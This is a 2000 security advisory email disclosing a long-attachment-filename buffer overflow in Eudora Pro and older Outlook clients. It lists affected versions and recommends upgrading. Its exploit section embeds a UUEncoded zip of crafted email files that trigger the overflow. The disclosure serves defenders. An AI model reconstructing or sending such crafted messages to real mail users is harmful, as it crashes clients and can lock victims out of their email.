Subject: [EXPL] Eudora Pro and Outlook vulnerable to long filename vulnerability
Date: Fri, 19 May 2000 00:56:58 +0200

          Eudora Pro and Outlook vulnerable to long filename vulnerability
--------------------------------------------------------------------------------

SUMMARY

The Eudora Pro and Outlook e-mail clients improperly handle filenames of
files attached in e-mails. If the attachment's filename is too long, a
buffer overflow condition is triggered as soon as the program processes
the attachment and tries to save the temporary file.

Outlook
In Outlook, if a filename has a graphic file extension (such as '.jpg')
the buffer overflow condition is initiated when trying to view or save the
message.

Eudora
In Eudora Pro, e-mail is processed while downloading the mail from the
server; so the buffer overflow occurs when message is processed from the
spool directory. This might lock the e-mail account for certain Eudora Pro
users.

DETAILS

Vulnerable systems:
Qualcomm Eudora Pro (all versions)
Outlook Express 4.x
Microsoft Outlook 98

Immune systems:
Eudora Light
Outlook Express 5.0

Patch:
There's no available patch. The recommended action to is upgrade to the
non-vulnerable version.

Exploit:
See attached file (The file has been UUEncoded since outlook will try and
open it by default):

_=_
_=_ Part 001 of 001 of file lfilename_bug.zip
_=_

begin 666 lfilename_bug.zip
M4$L#!!0``@```&YVKR@````````````````.````;&9I;&5N86UE7V)U9R]0
M2P,$%``"``@`;':O*.OBC2.G`0``2P0``",```!L9FEL96YA;65?8G5G+VQO
M;F=?9FEL96YA;65?8G5G+F5M;.U2;6_3,!#^3*3\AU.^@C.G+TMG*+"R3@*1
MK5+'X%MU3=S&([$C^R*:?X^33:)#$QH2'WEDR_;=/>=[N[2F%A!]J<C8"-X,
MY_M26HJ-W;\-@QLCGI"NV^V=S$G`UQ()"@,M_$!-0`9RBZ[TEP([>!<&%TA2
MP!KI%23P"36,..>0G(KI3(S'\)(GG(=!]C%;LEMIG3):0!)[T0>C26IB-UWC
M'=1M1:I!2R>U.LCB=1B\V)I6%VB[>:"5M]CX#_H]V_!D<3F=I&=Q
MRI,)3R/^F:TS5-61],K8&JM!Y172"LA4;HTS.X+KEBIC
MOL/RT%CI'$SB=!2/DX3'R4!0M;S^O!2PLJ9H<UG`HCMB/ZCA]A'-U[A4#OS"
M^S19GR?4WC_N)2@-?75@UX=%<6_/V+,S_KV.Y"DG385*]R7,2[1.TCQ2SK#9
M;'K&1M$1PZ)V.VG94N>F4'HO(-TJZB/XIU%HK.4\&J;KKMG_.8`M.GDZ^65R
MH5QCG*)A;I`(\[+V\M[MSC?OWO6YQ\+C_#^>@X<N_%6'&0N#GU!+`P04``(`
M"`!N=J\HJ01-1!\#``#M"```*P```&QF:6QE;F%M95]B=6<O;&]N9U]F:6QE
M;F%M95]B=6=?96YC;V1E9"YE;6SM5.]OFSH4_;Q(^1^NHGW8M`>Q(:2$+<U"
MDZR=1D.:].<T50XXP0M@9$S3O+_^&=JJ696];=(F;=(``[;OO9QS?/"%YH]]
M4SL),NE`$4LNWN9\320-(CW@B9[%]=H)E85(-9_(R($WI[N"]LNH@+(;&CJP
M$#RYJP4OLCEN6SK/>$SU+,MTF:54J@3X:&!#QVVD&Z9Z6)]>UFO/YAMX4A=>
MV'I'-YO5_26LF8Q@ZLU\8"'X_;YAM]N62ERH3[W9B7[_-4R+]!_`+?#(!@R$
M$&#+02T'&_#.F]5K'LUSLJ3:T4"14],!PO/%/"3!\]`.B#DGZ#G""!$[0&^K
M3RBN(\70@48E1>/KDLRX\S58]=JTF'^F@5)]M';@/"(20@X%K$DJ07((!,DC
M]1(JU+UZ;:"RG1U4V@["#C+A%5)]1>;(&VIG5.2,IPY@70U=:+Y@7#"Y<<`L
MN][4(RS>&CWF(B%Q-:4FJ'#`8X'@.5](&!\9NHDQTI7N
M!SR5-)7:;),IWU,;Z6O(JX5]K)U
MKA%V1^[`'>B=_L@R.A9J5#A80L<?A@[X@H=%0$-P-UN@[J?A[!&-8J;TCE@.
MZB)W6+02#"1WZPLLA5(=6)1LI5[&:]IWPWI*5JJ49A83EI8\@XB(G,IN@^5<
MLVVKHQF-K0Q!TGQ!A39,`QZR=.G`WIS)$L$]AK%@2Y:2&![,6!X/-JO<]6"R
MB`JI7@SN"[GR#(9>;X-^4D7O;[#F6O67!;]JO//>KZR>JEI*$=AO=
MWJ-H/;K]R\8OXL]-ZZ9YNK2O/+(<G?OK2_O"/!WTNJKB
MDUK+@U;S9#5Z[]LNMM\MUT/?-N.)R-L'_G9T&^>D$%_
M8A^&5[MJD6-W$JYN55Y_'6[E':J\2P.O/B1GK:MI_^9RXZZV,>^JM8/7=[4_
MN]:P"`\CU.O^_Y\Q)SEMMQY#!BS/>,YDM:$1*4D0)6J\],]";59_/?3;K_LO
M\M`/;D7E?OH?4$L!`A0`%``"````;G:O*`````````````````X`````````
M```P`````````&QF:6QE;F%M95]B=6<O4$L!`A0`%``"``@`;':O*.OBC2.G
M`0``2P0``",````````````@````+````&QF:6QE;F%M95]B=6<O;&]N9U]F
M:6QE;F%M95]B=6<N96UL4$L!`A0`%``"``@`;G:O**D$340?`P``[0@``"L`
M```````````@````%`(``&QF:6QE;F%M95]B=6<O;&]N9U]F:6QE;F%M95]B
D=6=?96YC;V1E9"YE;6Q02P4&``````,``P#F````?`4`````
`
end

ADDITIONAL INFORMATION

The information has been provided by:  <mailto:Ultor@HERT.ORG> Ultor.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.